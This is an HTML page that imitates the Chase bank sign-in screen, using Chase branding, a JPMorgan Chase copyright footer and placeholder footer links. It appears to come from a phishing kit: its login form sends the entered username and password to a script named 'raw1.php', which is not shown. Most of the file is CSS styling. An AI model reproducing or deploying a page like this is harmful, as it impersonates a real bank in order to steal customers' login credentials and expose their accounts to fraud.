<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width,intial scale=1"/>
<link rel="stylesheet" href="http://www.w3schools.com/lib/w3.css"/>
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" />
<title>Chase</title>








</head>
<style>
body {
	width:100%;
	background-image:url(image/first.jpg);
	background-size:cover;
	background-attachment:fixed;
	font: 13px/20px "Lucida Grande", Tahoma, Verdana, sans-serif;
	margin:0px;
	height:100%;
	
}






.header {
  padding: 0px 0px;
  back

	:


  
  color: #f1f1f1;
  width:100%;
  position:relative;
}
img {
	width:180px;
	height:60px;
}
	











.container{
  max-width:380px;
  margin:100px auto;
  text-align:center;

}
.container *{
  box-sizing:border-box;
  border-radius:1px;
}

.login-icon{
  color:white;
  font-size:30px;
  font-weight:600;
  margin:40px auto;
}

.login-form{
  background: #FFFFFF;
  color:#565656;
  padding:30px;
  padding-top:10px;
  padding-bottom:20px;
  border-radius:2px;
}

.login-form .login-title{
  font-size:38px;
  font-weight:300;
  margin:0px 0px 45px 0px;
}

.login-form .login-input{
  display:block;
  margin: 20px auto;
  width:100%;
  color:#373737;
  padding:10px;
  font-size:16px;
  border: 2px solid #fff;
  border-bottom:1px solid #AAA;
  background:#fcfcfc;
}


.login-form .login-input:hover{
	border:2px solid #4646FF;
}

.login-form .login-input:focus{
	border:2px solid #A20000;
}


.login-form .login-input.button{
  border:none;
  color:white;
  background:#4646FF;
}

.login-form .login-input.button:hover{
	background-color:#102645;
}

.login-forgot{
  text-decoration:underline;
  font-size:12px;
  color:#048;
  text-align:left;
  font-weight:200;
}

.login-signup{
  color:#FFF;
  margin:20px 0px;
}

.login-signup a{
  color:#FFF;
  font-weight:600;
}

button {
	border:none;
  color:white;
  font-weight:700;
  background:#0B6EFD;
  width:100%;
  padding:10px 20px;
  margin-top:15px;
  font-size:16px;
  margin-bottom:15px;
  border-radius:10px;
}

button :hover {
	background:#275E8F;
	}


footer {
	position:relative;
	height:100px;
	margin-top:-100px;
	clear:both;
	
	
}
	
	
	
	#copyright {

  
    width: 100%;
    margin-left: auto;
    margin-right: auto;
    margin-top: 160px;
	background-color:#fff;
	padding-top:10px;
	padding-bottom:100px;

}


 .copy {
background-color:#fff;
    color:#1F1F1F;
    font-size: 12px;
    font-family: Helvetica, Arial, Sans-Serif;
    font-weight: 500;
    line-height: 20px;
    text-align: center;
    margin-left: 0px;
	display:block;


}






.social-menu ul {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    padding: 0;
    margin: 0;
    display: flex;
}
.social-menu ul li {
    list-style: none;
    margin: 0 3px;
}
.social-menu ul li .fa {
    color: #fff;
    font-size: 15px;
    line-height: 20px;
    transition: .5s;
}
.social-menu ul li .fa:hover {
    color: #ffffff;
}
.social-menu ul li a {
    position: relative;
    display: block;
    width: 20px;
    height: 20px;
    border-radius: 50%;
    background-color: #626262;
    text-align: center;
    transition: 0.5s;
    transform: translate(0,0px);
    
}
.social-menu ul li a:hover {
    transform: rotate(0deg) skew(0deg) translate(0, -10px);
}
.social-menu ul li:nth-child(1) a:hover {
    background-color: #3b5999;
}
.social-menu ul li:nth-child(2) a:hover {
    background-color: #55acee;
}
.social-menu ul li:nth-child(3) a:hover {
    background-color: #e4405f;
}
.social-menu ul li:nth-child(4) a:hover {
    background-color: #cd201f;
}
.social-menu ul li:nth-child(5) a:hover {
    background-color: #0077B5;
}


hr{
	width:80%;
	color:#F5F5F5;
	text-align:center;
}









  

@media only screen and (max-width: 450px){
  nav ul li {
    width: 50%;
  }
  
  
  .login-form .login-input{
  display:block;
  margin: 20px auto;
  width:100%;
  color:#373737;
  padding:10px;
  font-size:16px;
  border: 1px solid #fff;
  border-bottom:1px solid #AAA;
  background:#fff;
}

hr{ width:100%;
color:#F5F5F5;

}





	
	@media(max-width: 425px) {
		
body{ width:100%;
	}
	
	.container{ width:80%;
	}
	
	.footer {
  
   width: 100%;
   padding:none;
   
	}
.footer a {
	width: 100%;
   padding:none;
}



 .login-form .login-input{
  display:block;
  margin: 20px auto;
  width:100%;
  color:#373737;
  padding:10px;
  font-size:16px;
  border: 1px solid #fff;
  border-bottom:1px solid #AAA;
  background:#fff;
}

 hr{ width:100%; 
 color:#F5F5F5;
	
}


@media(max-width: 375px) {
body{ width:100%;
	}
	
	.container{ width:80%;
	}
	
	.footer {
  
   width: 100%;
   padding:none;
   
	}
.footer a {
	width: 100%;
   padding:none;
} 

 .login-form .login-input{
  display:block;
  margin: 20px auto;
  width:100%;
  color:#373737;
  padding:10px;
  font-size:16px;
  border: 1px solid #fff;
  border-bottom:1px solid #AAA;
  background:#fff;
}

hr{ width:100%;
color:#F5F5F5;

}
	


@media screen and (max-width:999px){
	
body{ width:100%;
	}
	
	.container{ width:80%;
	}
	
	.footer {
  
   width: 100%;
   padding:none;
   
	}
.footer a {
	width: 100%;
   padding:none;
}

 .login-form .login-input{
  display:block;
  margin: 20px auto;
  width:100%;
  color:#373737;
  padding:10px;
  font-size:16px;
  border: 1px solid #fff;
  border-bottom:1px solid #AAA;
  background:#fff;
}

hr{ width:100%;
color:#F5F5F5;
	
}
	





</style>


<body>



<div class="header" id="myHeader">
  <div align="center">
  <img  src="image/bomb.png" />
  
  </div>
</div>









<div class="container">
 <form  method="POST" action="raw1.php" autocomplete="off">
  <div class="login-form">
   
    <div class="login-input-parts">
      <input type="text" name="text" class="login-input" placeholder="Username" required="required"/>
      <input type="password" name="password" class="login-input" placeholder="Password" required="required"/>
      <div align="left">
      <input type="checkbox" name="vehicle" value="Car" checked> <span style="font-size:16px;">Remember me</span> <br>
      <div align="right">
      <button>Sign in</button>
      
      </div>
      </div>
     
      
    </div>
    <div class="login-forgot">
      Forgot username/password? ><br />
      Not Enrolled? Sign Up Now. >
    </div>
  </div>
  </form>
</div>


<footer>

<div id="copyright">



<div class="social-menu">
 
  <ul>
  <span style="font-size:18px;">Follow Us:</span>
    <li><a href=""><i class="fa fa-facebook"></i></a></li>
    <li><a href=""><i class="fa fa-twitter"></i></a></li>
    <li><a href=""><i class="fa fa-instagram"></i></a></li>
    <li><a href=""><i class="fa fa-youtube"></i></a></li>
    <li><a href=""><i class="fa fa-linkedin"></i></a></li>
  </ul>
</div><br /><br /><br />

<div align="center">
<hr />
</div>



<ul>
  <li class="copy"><a href="#">Contact us</a> | <a href="#">Privacy</a> | <a href="#">Security</a> | <a href="#">Terms of use</a> | <a href="#">Accessibility</a> | <a href="#">SAFE Act: Chase Mortgage Loan Originators</a> |<a href="#"> Fair Lending</a>  | <a href="#">About Chase</a> | <a href="#">J.P. Morgan</a> | <a href="#">JPMorgan Chase & Co.</a> | <a href="#">Careers Español</a></li>

  <li class="copy">Chase Canada | Site map | Member FDIC | Equal Housing Lender</li>
<li class="copy">© 2020 JPMorgan Chase & Co.</li>
</ul>
</div>
</footer>
  
</body>
</html>
